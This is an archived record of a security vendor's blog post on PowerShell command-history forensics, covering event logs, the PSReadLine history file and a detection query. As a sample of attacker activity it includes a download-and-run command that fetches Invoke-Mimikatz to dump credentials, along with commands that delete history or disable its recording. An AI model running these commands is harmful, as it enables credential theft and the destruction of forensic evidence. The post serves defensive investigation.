{
	"id": "3954e8ca-4135-49fd-808b-12e89001e57f",
	"created_at": "2026-04-06T00:12:32.743146Z",
	"updated_at": "2026-04-10T03:21:55.509172Z",
	"deleted_at": null,
	"sha1_hash": "d0aa44a2fd17727da99b833b60dffe0d233ca847",
	"title": "PowerShell Command History Forensics",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 58004,
	"plain_text": "PowerShell Command History Forensics\r\nBy Vikas 26 Aug 2020\r\nPublished: 2020-08-26 · Archived: 2026-04-05 18:21:31 UTC\r\nContents:\r\n- Overview\r\nPowershell and Windows Events\r\nGet-History\r\nConsole History File\r\n- Adversarial Tactics\r\nClear-History\r\nBackup/Restore Histroy\r\nDelete File History\r\nChange PSReadline Configuration\r\n- Investigation Tips\r\nOverview\r\nPowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating\r\nsystem. Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution\r\nof code.\r\nPowerShell may also be used to download and run executables from the Internet, which can be executed from disk or in\r\nmemory without touching disk.\r\nWe have a separate blog which touches certain aspects of a malicious PowerShell script here - Decoding Malicious\r\nPowerShell Activity - A Case Study - Blog - Malware Questions - Sophos Community\r\nA number of PowerShell-based offensive testing tools are available, including Empire, PowerSploit, PoshC2, and PSAttack.\r\nPowerShell and Windows Events\r\nWith Sophos EDR, you can use “PowerShell events suspected of using encoded or encrypted data” Live Discover Query. It\r\noutputs a list PowerShell processes and script block events that are suspected of using encoded or encrypted data.\r\nOn the host side of forensics, there are 3 places where we look for signs of suspicious PowerShell script or command\r\nexecution whether it’s local or remote:\r\n1. Application Event Logs\r\nEvent ID 7045: Adversaries often attempt to register backdoors as Windows Services as a persistence mechanism i.e.\r\nsurvive reboots.\r\n2. Windows PowerShell.evtx\r\nEvent ID 400: The engine status is changed from None to Available. This event indicates the start of a PowerShell\r\nactivity, whether local or remote.\r\nThe field ‘HostApplication’ might display the encoded bits used such as:\r\nhttps://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics\r\nPage 1 of 4\n\nHostApplication=powershell.exe -\r\nEncodedCommand VwByAGkAdABlAC0ASABvAHMAdAAgAC0ATwBiAGoAZQBjAHQAIAAiAEgAZQBsAGwAbwAsACAAdwBv\r\nBkACEAIgA7AA==\r\nEvent ID 600: indicates that providers such as WSMan start to perform a PowerShell activity on the system, for\r\nexample, “Provider WSMan Is Started”.\r\nEvent ID 403: The engine status is changed from Available to Stopped. This event records the completion of a\r\nPowerShell activity.\r\n3. Microsoft-Windows-PowerShell/Operational.evtx\r\nNOTE: This is not applicable for PowerShell 2.0\r\nEvent ID 4103: Module Logging is disabled by default. If enabled, it will record portions of scripts, some de-obfuscated code, and some data formatted for output.\r\nEvent ID 4104: Script Block Logging is enabled by default. It records blocks of code as they are executed by the\r\nPowerShell engine, thereby capturing the full contents of code executed by an attacker, including scripts and\r\ncommands.\r\nThere’s a fourth place where we can potentially look from a forensics’ perspective. If commands are carried out on a\r\nPowerShell console, a session history i.e. list of commands entered during the current session is saved. On PowerShell\r\nversions \u003c 5, a session specific history can be identified using the Get-History command. The list is lost if the session is\r\nclosed.\r\nGet-History\r\nThe Get-History cmdlet gets the session history, that is, the list of commands entered during the current session. Beginning\r\nin Windows PowerShell 3.0, the default value is 4096.\r\nPS C:\\WINDOWS\\system32\u003e Get-History\r\n  Id CommandLine\r\n  -- -----------\r\n   1 (Get-PSReadlineOption).HistorySavePath\r\n   2 ping localhost\r\n   3 Test-Path ((Get-PSReadlineOption).HistorySavePath)\r\n   4 Get-History\r\n   5 powershell.exe -exec bypass -C \"IEX (New-Object\r\nNet.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke\r\nMimikatz.ps1');Invoke-Mimikatz -DumpCreds\"\r\n   6 whoami\r\nConsole History File\r\nThe PSReadline module is installed and enabled by default starting from PowerShell v5 on Windows 10 onward. It is\r\nresponsible for recording what is typed into the console. The default option is to save history to a file.\r\nNOTE: PSReadLine is not included in the separately installed PowerShell 5 for previous versions of Windows. Thus, if you\r\nwant to use the PowerShell command history functionality you will need to install the PSReadLine module separately.\r\nThe default location of this file:\r\nhttps://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics\r\nPage 2 of 4\n\n$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\r\nPSReadLine requires PowerShell 3.0, or newer, and the console host. It does not work in PowerShell ISE.\r\nA sample output:\r\nAdversarial Tactics\r\nAttackers have been seen to delete forensic artifacts in the form of Windows Event Logs to cover their tracks. They may also\r\nclear the command history of a compromised account to conceal the commands executed during/after a successful intrusion.\r\nWe’ll discuss some of the possible tactics in detail.\r\nClear-History\r\nBy default, Clear-History deletes the entire command history from a PowerShell session but it does not delete/flush the\r\nPSReadLine command history file on the disk. This tactic would be useful for attackers on PowerShell versions \u003c5 on\r\nWindows 7 / 8.1 / Windows Server 2008 / R2 / 2012R2 as there is no physical file containing the command history.\r\nBackup/Restore History\r\nBackup the existing file with a view to restore it after. e.g.\r\nrename-item -path $env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt -newname\r\nConsoleHost_history_before.txt\r\nIf they use PowerShell to perform this activity will result in this action to be logged.\r\nDelete History File\r\nThe adversary could delete the history file from the PowerShell prompt at the end of a session:\r\nremove-item -force -path $env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt\r\nChange PSReadline Configuration\r\nAn adversary may change the default behaviour of the PSReadline configuration and prevent the history of commands being\r\nrecorded.\r\nSet-PSReadlineOption -HistorySaveStyle SaveNothing\r\nThey could possibly re-enable it afterwards,\r\nSet-PSReadlineOption -HistorySaveStyle SaveIncrementally\r\nThe act of changing the style of event history from a PS prompt would be logged.  The presence of these commands in the\r\nhistory would be a red flag. It may sound like an over-kill but for the sake of completeness, it’s worthy of a mention.\r\nInvestigation Tips\r\nIf you happen to stumble upon a rich ConsoleHost_history.txt like the one below, you’re in luck.\r\nIf the last command(s) executed are surprisingly less or include:\r\nSet-PSReadlineOption -HistorySaveStyle SaveIncrementally\r\nor\r\nhttps://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics\r\nPage 3 of 4\n\n$env:APPDATA\\Microsoft\\Windows\\PowerShell\\PSReadLine\\ConsoleHost_history.txt -newname\r\nConsoleHost_history_before.txt\r\nor\r\nClear-History\r\nor\r\nConsoleHost_history.txt is not present on a machine.\r\nIt could mean that the history or the file it-self has been tampered with.\r\nThese Indicator of Compromise [IOCs] could help us identify what might have happened:\r\n1. If the file was tampered with, we would like to identify if a non-PowerShell process such as Command Prompt or\r\nWindows Explorer was used to modify/delete the history file.\r\n2. The “Creation Time” of ConsoleHost_history.txt is fairly recent. This could indicate that the attacker deleted the\r\nprevious file and it has been automatically generated when PowerShell was executed again.\r\n3. If we recorded any process related detail which had the following command-line:\r\n-HistorySaveStyle SaveNothin\r\nThe following Live Discover Query could be used prior to the investigation of the actual ConsoleHost_history.txt file if you\r\nsuspect any modification/deletion:\r\nselect CAST( datetime(sfj.time,'unixepoch') AS TEXT) DATE_TIME,\r\nsfj.subject,\r\nCAST( datetime(sfj.creationtime,'unixepoch') AS TEXT) CREATION_DATE_TIME,\r\nsfj.pathname,\r\nspj.cmdline,\r\nspj.sid\r\nfrom sophos_file_journal sfj join sophos_process_journal spj on spj.sophosPID = sfj.sophosPID\r\nwhere sfj.pathname like '%ConsoleHost_history.txt' and spj.cmdline not like '%powershell%';\r\nIf the file has been deleted by Explorer.exe, the output should be similar to:\r\nSource: https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics\r\nhttps://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics\r\nPage 4 of 4",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MITRE"
	],
	"references": [
		"https://community.sophos.com/sophos-labs/b/blog/posts/powershell-command-history-forensics"
	],
	"report_names": [
		"powershell-command-history-forensics"
	],
	"threat_actors": [],
	"ts_created_at": 1775434352,
	"ts_updated_at": 1775791315,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d0aa44a2fd17727da99b833b60dffe0d233ca847.pdf",
		"text": "https://archive.orkl.eu/d0aa44a2fd17727da99b833b60dffe0d233ca847.txt",
		"img": "https://archive.orkl.eu/d0aa44a2fd17727da99b833b60dffe0d233ca847.jpg"
	}
}